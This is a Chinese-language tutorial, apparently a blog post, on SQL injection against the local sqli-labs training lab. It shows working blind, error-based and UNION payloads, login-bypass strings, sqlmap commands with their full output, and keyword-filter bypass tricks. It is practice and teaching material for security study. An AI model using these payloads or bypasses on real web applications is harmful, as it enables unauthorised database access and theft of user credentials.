文章目录
一、GET请求盲注
1.盲注简介
盲注介绍
Blind SQL(盲注)是注入攻击的一种,向数据库发生true或false这样的问题,并根据应用程序返回的信息判断结果。
这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有解决SQL注入存在的代码问题。
盲注种类
- 时间盲注
- 布尔盲注
2.GET基于时间的盲注
原理概述
在MySQL中,if(exp1,exp2,exp3)相当于三元运算符:
exp1为True则执行exp2,否则执行exp3。
所以以下语句:
if(ascii(substr(database(),1,1))=115,1,sleep(3))
如果ascii(substr(database(),1,1))=115执行成功则为1,否则执行sleep(3)。
测试:
select if(ascii(substr(database(),1,1))=115,1,sleep(3));
打印
+--------------------------------------------------+
| if(ascii(substr(database(),1,1))=115,1,sleep(3)) |
+--------------------------------------------------+
| 1 |
+--------------------------------------------------+
1 row in set (0.01 sec)
返回结果为1,也印证了ascii(substr(database(),1,1))=115为True。
该语句的意思是:当前数据库名子字符串(从第一个位置开始截取1个字符,即第一个字符)对应的ASCII码为115,当前数据库为security,首字母为s,其对应的ASCII码为115,所以为True。
判断是否存在注入点
访问http://127.0.0.1/sqli-labs/Less-5/?id=1’ and if(1=0,1,sleep(3)) --+,显示
显然,请求延迟了3秒,说明存在注入点,可以进行下一步操作。
判断数据库长度
数据库长度指数据库名的字符数。
访问http://127.0.0.1/sqli-labs/Less-5/?id=1’ and if(length(database())=8,sleep(3),1) --+,显示:
请求延迟了3秒,说明数据库长度为8(8是经过很多次尝试得出的,开始猜一个可能的值,如果无延迟则继续尝试)。
判断数据库名字
访问http://127.0.0.1/sqli-labs/Less-5/?id=1’ and if(ascii(substr(database(),1,1))=115,1,sleep(3)) --+,显示:
显然,请求未延迟,说明数据库的首字母为s,再依次对接下来的字母进行尝试,即可破解出数据库名。
sqlmap安全测试
用sqlmap测试时间盲注如下:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-5/?id=1 --technique T --current-db
显示:
显然,花的时间较多,探测出当前数据库为security。
得到的Payload如下:
即id=1’ AND (SELECT 9017 FROM (SELECT(SLEEP(5)))oDkD)-- myGo,利用其进行测试:
访问http://127.0.0.1/sqli-labs/Less-5/?id=1’ AND (SELECT 9017 FROM (SELECT(SLEEP(5)))oDkD)-- myGo --+,显然,请求延迟了5秒。
3.GET基于Boolean的盲注
原理概述
在进行基于布尔的盲注时,我们通常采用下面的办法猜解字符串:
| SQL语句 | 显示状态 | 说明状态 |
|---|---|---|
| ((select length(database()))>5) | 正常 | true |
| ((select length(database()))>10) | 无显示 | false |
| ((select length(database()))>7) | 正常 | true |
| ((select length(database()))>8) | 无显示 | false |
| SQL语句 | 显示状态 | 说明状态 |
|---|---|---|
| ((select ascii(substr(database(),1,1)))>75) | 正常 | true |
| ((select ascii(substr(database(),1,1)))>100) | 正常 | true |
| ((select ascii(substr(database(),1,1)))>113) | 正常 | true |
| ((select ascii(substr(database(),1,1)))>119) | 无显示 | false |
| ((select ascii(substr(database(),1,1)))>116) | 无显示 | false |
| ((select ascii(substr(database(),1,1)))>114) | 正常 | true |
| ((select ascii(substr(database(),1,1)))>115) | 无显示 | false |
select length(database());
select substr(database(),1,1);
select ascii(substr(database(),1,1));
select ascii(substr(database(),1,1)) > N;
select ascii(substr(database(),1,1)) = N;
select ascii(substr(database(),1,1)) < N;
判断数据库长度
在数据库中测试:
select length(database()) = 8;
打印
+------------------------+
| length(database()) = 8 |
+------------------------+
| 1 |
+------------------------+
1 row in set (0.01 sec)
返回1,即返回True,当前数据库的长度为8。
再次测试:
select * from users where id = 1 and length(database()) = 8;
打印
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
访问http://127.0.0.1/sqli-labs/Less-5/?id=1’ and length(database())=8 --+,显示:
出现了You are in…,即正常访问。
再访问http://127.0.0.1/sqli-labs/Less-5/?id=1’ and length(database())=9 --+,显示:
此时未出现You are in…,显然,数据库长度为8。
判断数据库名字
数据库中测试:
select * from users where id = 1 and (select ascii(substr(database(),1,1))=115);
打印
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
访问http://127.0.0.1/sqli-labs/Less-5/?id=1’ and (select ascii(substr(database(),1,1))=115) --+和http://127.0.0.1/sqli-labs/Less-5/?id=1’ and (select ascii(substr(database(),1,1))=116) --+,显示如下:
显然,第一个字母为s。
sqlmap安全测试
用sqlmap测试布尔盲注如下:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-5/?id=1 --technique B --current-db
显示:
花的时间较少,也探测出当前数据库为security。
在这种情况下,布尔盲注的效率相对较高。
得到的Payload如下:
即id=1’ AND 3835=3835 AND ‘YqTv’='YqTv,利用其进行测试:
访问http://127.0.0.1/sqli-labs/Less-5/?id=1’ AND 3835=3835 AND ‘YqTv’='YqTv --+,此时不能正常访问。
二、POST请求注入
1.POST基于错误的注入
POST请求的特点
- POST请求不能被缓存下来
- POST请求不会保存在浏览器浏览记录中
- 以POST请求的URL无法保存为浏览器书签
- POST请求没有长度限制
POST基于错误单引号注入
注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改,可以借助对应的插件完成修改任务。
http://127.0.0.1/sqli-labs/Less-11/表单提交进行测试如下:
出现报错
‘admin’ LIMIT 0,1’
可以猜测SQL语句为:
select * from xxx where uname = 'uname' or 1 = 1 -- ' and passwd = 'password';
进行测试:
用户名输入admin’ or 1 = 1 – ,密码随便输入一个,显示:
显然,此时正常登录。
POST基于错误双引号注入
和基于错误单引号一样,在浏览器中无法查看与修改,需要借助借助对应的插件完成修改任务。
http://127.0.0.1/sqli-labs/Less-12/表单提交进行测试如下:
出现报错
‘123") LIMIT 0,1’
可以猜测SQL语句为:
select * from xxx where uname = ("uname") or 1 = 1 -- ") and passwd = 'password';
进行测试:
用户名输入admin") or 1 = 1 – ,密码随便输入一个,显示:
显然,此时也正常登录。
sqlmap安全测试
(1)单引号错误注入测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/ --data="uname=admin&passwd=123" --current-db
打印
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:11:23 /2020-03-04/
[20:11:23] [INFO] testing connection to the target URL
[20:11:23] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:11:23] [INFO] testing if the target URL content is stable
[20:11:24] [INFO] target URL content is stable
[20:11:24] [INFO] testing if POST parameter 'uname' is dynamic
[20:11:24] [WARNING] POST parameter 'uname' does not appear to be dynamic
[20:11:24] [INFO] heuristic (basic) test shows that POST parameter 'uname' might be injectable (possible DBMS: 'MySQL')
[20:11:24] [INFO] heuristic (XSS) test shows that POST parameter 'uname' might be vulnerable to cross-site scripting (XSS) attacks
[20:11:24] [INFO] testing for SQL injection on POST parameter 'uname'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:11:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:11:26] [WARNING] reflective value(s) found and filtering out
[20:11:26] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:11:26] [INFO] testing 'Generic inline queries'
[20:11:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:11:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:11:28] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:11:29] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:11:31] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:11:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:11:34] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:11:37] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:11:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:11:40] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[20:11:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:11:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:11:42] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:11:42] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:11:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[20:11:43] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[20:11:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:11:44] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:11:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:11:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:11:48] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:11:49] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:11:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:11:50] [INFO] POST parameter 'uname' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:11:50] [INFO] testing 'MySQL inline queries'
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:11:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:11:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:12:00] [INFO] POST parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:12:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:12:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:12:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:12:01] [INFO] target URL appears to be UNION injectable with 2 columns
[20:12:01] [INFO] POST parameter 'uname' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1074 HTTP(s) requests:
---
Parameter: uname (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=admin' AND (SELECT 2046 FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(2046=2046,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFOR
MATION_SCHEMA.PLUGINS GROUP BY x)a)-- cRtr&passwd=123
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin' AND (SELECT 5495 FROM (SELECT(SLEEP(5)))pVWe)-- Kzkg&passwd=123
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=-1041' UNION ALL SELECT CONCAT(0x716a707071,0x56476a6e76776f4a657355716c53774761706f57684856426e666965477954624a78444866597550,0x717162
6271),NULL#&passwd=123
---
[20:12:02] [INFO] the back-end DBMS is MySQL
[20:12:02] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:12:02] [INFO] fetching current database
current database: 'security'
[20:12:02] [INFO] fetched data logged to text files under 'xxxx\output\127.0.0.1'
[*] ending @ 20:12:02 /2020-03-04/
(2)双引号错误注入测试:
先建立一个target.txt文档,再按下述步骤获取参数存入该文档:
再测试:
python sqlmap.py -r "xxxx\target.txt" -p passwd --technique E
打印
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:22:24 /2020-03-04/
[20:22:24] [CRITICAL] specified HTTP request file 'xxxx\target.txt' does not exist
[*] ending @ 20:22:24 /2020-03-04/
E:\SQLMAP\sqlmapproject-sqlmap-0605f14
λ python sqlmap.py -r C:\Users\Lenovo\Desktop\target.txt -p passwd --technique E
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:23:02 /2020-03-04/
[20:23:02] [INFO] parsing HTTP request from 'xxxx\target.txt'
[20:23:02] [WARNING] provided value for parameter 'passwd' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[20:23:02] [INFO] resuming back-end DBMS 'mysql'
[20:23:02] [INFO] testing connection to the target URL
[20:23:03] [INFO] heuristic (basic) test shows that POST parameter 'passwd' might be injectable (possible DBMS: 'MySQL')
[20:23:03] [INFO] testing for SQL injection on POST parameter 'passwd'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:23:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:23:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:23:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:23:08] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:23:09] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:23:10] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:23:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:23:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:23:13] [INFO] POST parameter 'passwd' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
POST parameter 'passwd' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 381 HTTP(s) requests:
---
Parameter: passwd (POST)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=&passwd=") OR (SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(5753=5753,1))),0x716b717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("wTnR"="wTnR&submit=Submit
---
[20:23:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[20:23:15] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 20:23:15 /2020-03-04/
BURPSUITE的使用
可参考https://blog.csdn.net/ft4729710/article/details/58164973。
2.POST基于时间的盲注
在存在注入点POST提交的参数后加
and (select (if(length(database())>5,sleep(5),null))) --
如果执行的页面响应时间大于5秒,肯定就存在注入,并且对应的SQL语句执行。
先进行测试,如下:
显然,虽然没有明确的报错信息,但是还是可以区分正常和错误的请求。
用户名输入admin’ and (select (if(length(database())>5,sleep(5),null))) – ,密码随便输入,提交:
显然,请求延迟了5秒,说明存在注入点。
sqlmap安全测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-15/ --data="uname=admin&passwd=123" --current-db --technique T
打印
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:46:34 /2020-03-04/
[20:46:34] [INFO] testing connection to the target URL
[20:46:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:46:34] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[20:46:34] [INFO] testing for SQL injection on POST parameter 'uname'
[20:46:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:46:34] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[20:46:45] [INFO] POST parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:46:55] [INFO] checking if the injection point on POST parameter 'uname' is a false positive
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin' AND (SELECT 8829 FROM (SELECT(SLEEP(5)))PxOu) AND 'Bvhj'='Bvhj&passwd=123
---
[20:47:15] [INFO] the back-end DBMS is MySQL
[20:47:15] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12
[20:47:15] [INFO] fetching current database
[20:47:15] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[20:47:31] [INFO] adjusting time delay to 1 second due to good response times
security
current database: 'security'
[20:47:52] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 20:47:52 /2020-03-04/
显然,探测出当前的数据库。
3.POST基于布尔的盲注
在存在注入点POST提交的参数后加入if判断语句
select ascii(substr(database(),1,1)) < N;
用户名输入admin’ and (length(database())>10) – ,密码随便输入,提交:
存在注入点。
sqlmap安全测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-15/ --data="uname=admin&passwd=123" --current-db --technique B
打印
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:49:40 /2020-03-04/
[20:49:40] [INFO] testing connection to the target URL
[20:49:40] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:49:40] [INFO] testing if the target URL content is stable
[20:49:41] [INFO] target URL content is stable
[20:49:41] [INFO] testing if POST parameter 'uname' is dynamic
[20:49:41] [WARNING] POST parameter 'uname' does not appear to be dynamic
[20:49:41] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[20:49:41] [INFO] testing for SQL injection on POST parameter 'uname'
[20:49:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:49:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:49:41] [WARNING] POST parameter 'uname' does not seem to be injectable
[20:49:41] [INFO] testing if POST parameter 'passwd' is dynamic
[20:49:41] [WARNING] POST parameter 'passwd' does not appear to be dynamic
[20:49:41] [WARNING] heuristic (basic) test shows that POST parameter 'passwd' might not be injectable
[20:49:41] [INFO] testing for SQL injection on POST parameter 'passwd'
[20:49:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:49:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:49:41] [WARNING] POST parameter 'passwd' does not seem to be injectable
[20:49:41] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform m
ore tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you
could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 20:49:41 /2020-03-04/
显然,此时未探测出当前的数据库,需要进一步探测。
三、SQL注入绕过手段
如果程序中设置了过滤关键字,但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只是对整体进行过滤。
例如:出现and过滤,这种过滤只是发现关键字出现才会过滤,并不会对关键字处理,所以可以采取一些措施绕过。
1.大小写绕过
通过修改关键字内字母大小写来绕过过滤措施。
例如:
and 改为 AnD或ANd
order by 改为 OrDEr bY
2.双写绕过
如果在程序中设置出现关键字之后替换为空,那么SQL注入攻击也不会发生。
对于这样的过滤策略可以使用双写绕过,因为在过滤过程中只进行了一次替换,还剩下一个关键字可以继续探测注入。
例如:
and 改为 aandnd
or 改为 oorr
3.编码绕过
可以利用URL编码工具绕过SQL注入的过滤机制。
例如:
可以将http://127.0.0.1/sqli-labs/Less-5/?id=1’ AND 3835=3835 AND ‘YqTv’='YqTv --+改为http://127.0.0.1/sqli-labs/less-5/?id=1%27%20and%203835=3835%20and%20%27yqtv%27=%27yqtv%20–+。
可以在HackBar或者http://tool.chinaz.com/Tools/urlencode.aspx中进行URL编码。
4.内联注释绕过
在MySQL中内联注释中的内容可以被当做SQL语句执行。
例如:
/*!select*/ * from users;
打印
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 13 | admin4 | admin4 |
| 14 | admin5 | admin5 |
+----+----------+------------+
14 rows in set (0.00 sec)
即被内联注释掉的SQL语句也能正常执行。
